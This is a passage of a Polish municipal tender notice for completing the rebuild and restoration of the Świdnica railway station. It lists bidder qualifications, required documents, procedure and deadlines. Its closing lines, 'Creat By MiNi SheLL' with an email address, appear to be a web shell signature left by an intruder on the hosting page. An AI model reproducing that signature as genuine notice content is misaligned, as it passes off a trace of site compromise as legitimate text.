<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże wykonanie robót budowlanych o zakresie zgodnym z przedmiotem zamówienia, tj. przedłoży wykaz ; minimum 2-ch robót polegających na budowie lub przebudowie budynków użyteczności publicznej o kubaturze nie mniejszej od 10 000 m3 w zakresie robót budowlanych i instalacyjnych 
oraz 
; minimum 1-nej roboty polegającej na rewaloryzacji zabytkowego budynku, w zakresie której było w wykonanie prac sztukatorskich, konserwacji kamieniarki architektonicznej, konserwacji zabytkowych elementów stalowych, konserwacji zabytkowej stolarki oraz konserwacji zabytkowych, sklepionych wnętrz budynku (jak istniejący hall dworca) , 
przy czym roboty dotyczące przebudowy i roboty dotyczące rewaloryzacji mogą być wykazane w tych samych budynkach lub w budynkach różnych.
Zamawiający bezwzględnie wymaga, by wykazane wykonanie prac rewaloryzacyjnych dotyczyło robót zgodnych z przedmiotem zamówienia; tj. by obejmowało wykonanie min. 1-nej realizacji w zakresie której było wykonanie prac sztukatorskich, min. 1-nej realizacji obejmującej konserwację kamieniarki architektonicznej, min. 1-nej roboty obejmującej konserwację zabytkowych elementów stalowych, min. 1-nej z konserwacją zabytkowej stolarki oraz min. 1-nej realizacji obejmującej konserwację sklepionych wnętrz budynku. Minimalna kubatura budynku poddanego rewaloryzacji winna wynosić 3 000 m3.
Roboty te winny być wykonane w okresie ostatnich 5 lat przed upływem terminu składania ofert, a w przypadku, gdy okres działalności jest krótszy - w tym okresie, 
- Wykonawca dołączy dokumenty potwierdzające, że w/w roboty wykonane zostały należycie; z treści tych dokumentów musi wynikać potwierdzenie wszystkich danych zawartych w w/w wykazie w tym: nazwę zadania i adres, wartość netto robót, rodzaj robót objętych zadaniem, opis robót wykonanych przez Wykonawcę, okres realizacji robót przez Wykonawcę, kubatura budynku, w którym były wykonane, wraz z potwierdzeniem przez Zamawiającego prawidłowego ich wykonania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedłoży wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w tym wykaże osoby, które kierować będą przebudową: kierownik budowy, kierownik robót dla branży sanitarnej, kierownik robót dla branży elektrycznej, osoba posiadająca doświadczenie w kierowaniu robotami budowlanymi prowadzonymi przy zabytku nieruchomym z zastrzeżeniem, że:
osoby typowane do nadzorowania robót winny posiadać uprawnienia budowlane (kierownik budowy winien posiadać uprawnienia bez ograniczeń),  przynależeć do odpowiedniej izby samorządu zawodowego odpowiednio do charakteru nadzorowanych robót:
, dla robót ogólnobudowlanych kubaturowych i dla nadzorowania robót prowadzonych przy zabytku nieruchomym - uprawnienia budowlane w specjalności konstrukcyjno - budowlanej,
; dla robót instalacyjnych wod-kan-gaz-c.o. - uprawnienia budowlane w specjalności instalacyjno - sanitarnej
; dla robót instalacji elektrycznych - uprawnienia budowlane w specjalności instalacyjno - elektrycznej,
zgodnie z obowiązującymi przepisami Prawa budowlanego w tym zakresie.
- osoby typowane do funkcji kierownika budowy i do kierowania robotami budowlanymi prowadzonymi przy zabytku nieruchomym winny posiadać niezbędne doświadczenie:
; kierownik budowy - doświadczenie w kierowaniu minimum 2 budowami dotyczącymi przebudowy budynków użyteczności publicznej o kubaturze min. 10 000 m3,
; osoba do nadzorowania prac konserwatorskich na budynku - winna posiadać co najmniej 2-letnią praktykę na budowie przy zabytku nieruchomym, w tym praktyka w kierowaniu pracami konserwatorskimi w zakresie których było wykonanie prac sztukatorskich, konserwacji kamieniarki architektonicznej, konserwacji zabytkowych elementów stalowych, renowacji stolarki oraz renowacji sklepionych wnętrz budynku, z zastrzeżeniem, że minimalna kubatura nadzorowanego budynku poddanego renowacji winna wynosić 3000 m3</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że:
- posiada środki finansowe lub zdolność kredytową w wysokości min. 1 mln. zł ,
- posiada ważne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej dotyczące przedmiotu zamówienia na sumę ubezpieczenia nie mniejszą jak: 2 mln zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- wykaz budów, którymi kierował wskazany kierownik budowy z informacją o nazwie zadania, adresie, kubaturze budynków, pełnionej funkcji, rodzaju i zakresie nadzorowanych robót, okresie realizacji, .. (wg wzoru w załączniku nr 5 do specyfikacji  (zał. nr 5 do oferty Wykonawcy- Zamawiający wymaga, aby wskazany przez Wykonawcę kierownik budowy posiadał doświadczenie w kierowaniu minimum 2 budowami dotyczącymi przebudowy budynków użyteczności publicznej o kubaturze min. 10 000 m3 ..
-  Osoba wskazana do nadzorowania prac konserwatorskich na budynku powinna ponadto posiadać co najmniej 2-letnią praktykę na budowie przy zabytku nieruchomym (należy dołączyć wykaz odbytej praktyki na budowie przy zabytkach nieruchomych z podaniem nazwy zadania, adresu, pełnionej funkcji, wielkości obiektu, rodzaju nadzorowanych prac konserwatorskich i okresie ich realizacji). Dodatkowo z wykazu wynikać winna praktyka w kierowaniu pracami konserwatorskimi w zakresie których było wykonanie prac sztukatorskich, konserwacji kamieniarki architektonicznej, konserwacji zabytkowych elementów stalowych, renowacji stolarki oraz renowacji sklepionych wnętrz budynku), z zastrzeżeniem, że minimalna kubatura nadzorowanego budynku poddanego renowacji winna wynosić 3000 m3 - zał. 6 do oferty (odpowiednio wg wzoru nr 5 do SIWZ)
h) wykaz części zamówienia, których realizację Wykonawca zamierza powierzyć podwykonawcom wg wzoru nr 6 do SIWZ ( zał. nr 7 do oferty Wykonawcy) 
Zamawiający dopuszcza realizację zamówienia w systemie podwykonawczym z zastrzeżeniem jak w §9 ust.5 projektu umowy (zał.9 do SIWZ). 
- zestawienie elementów rozliczeniowych (wykaz cen) - załącznik nr 16 do oferty Wykonawcy wg wzoru nr 8,

- zaparafowany projekt umowy - załącznik nr 17 do oferty (wg wzoru nr 9),
- dowód wniesienia wadium - załącznik nr 18 do oferty,
- pełnomocnictwo do działania w imieniu Wykonawcy w przypadku, gdy nie jest to osoba upoważniona do reprezentowania Wykonawcy z mocy prawa - załącznik nr 19 do oferty,
- pełnomocnictwo do reprezentowania Wykonawców oferty wspólnej w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, zgodnie z art. 23 ust. 2 ustawy pzp w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) - zał. nr 20 do oferty</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2. Zamawiający przewiduje zmiany umowy w formie pisemnej w następujących przypadkach:
a/ jeżeli zmiana umowy jest korzystna dla Zamawiającego (korzyść ekonomiczna, techniczna, eksploatacyjna),

b/ jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia,

c/ Wykonawca może przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
- zawieszenia robót przez Zamawiającego,
- szczególnie niesprzyjających warunków atmosferycznych ( z wyłączeniem sytuacji wynikających z nie dotrzymania przez Wykonawcę terminu jak w Dz. IV pkt 1 lit. d/ i lit. e/ SIWZ),
- zmian dokumentacji projektowej, dokonanych na wniosek Zamawiającego lub zaakceptowanych przez Zamawiającego.

d/ Wykonawca może dokonać zmian osób, pełniących funkcje kierownicze na budowie z zachowaniem właściwych kwalifikacji zawodowych.

3. Zmiany w umowie mogą być dopuszczone wyłącznie pod warunkiem złożenia wniosku przez Wykonawcę i po akceptacji Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swidnica.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124, I p...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2012 godzina 09:00, miejsce: Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124, I p...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestor 15.06.2012r. zawarł z Województwem Dolnośląskim umowę o dofinansowanie inwestycji Budowa Centrum Przesiadkowego przy ul. Dworcowej i Kolejowej w Świdnicy; w tym o dofinansowanie robót będących przedmiotem niniejszego postępowania dotyczącego dokończenia robót Przebudowy i rewaloryzacji budynku dworca kolejowego w Świdnicy, ze środków pomocowych w ramach RPO dla Województwa Dolnośląskiego na lata 2007-2013 w ramach priorytetu Rozwój infrastruktury transportowej na Dolnym Śląsku (Transport miejski i podmiejski)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com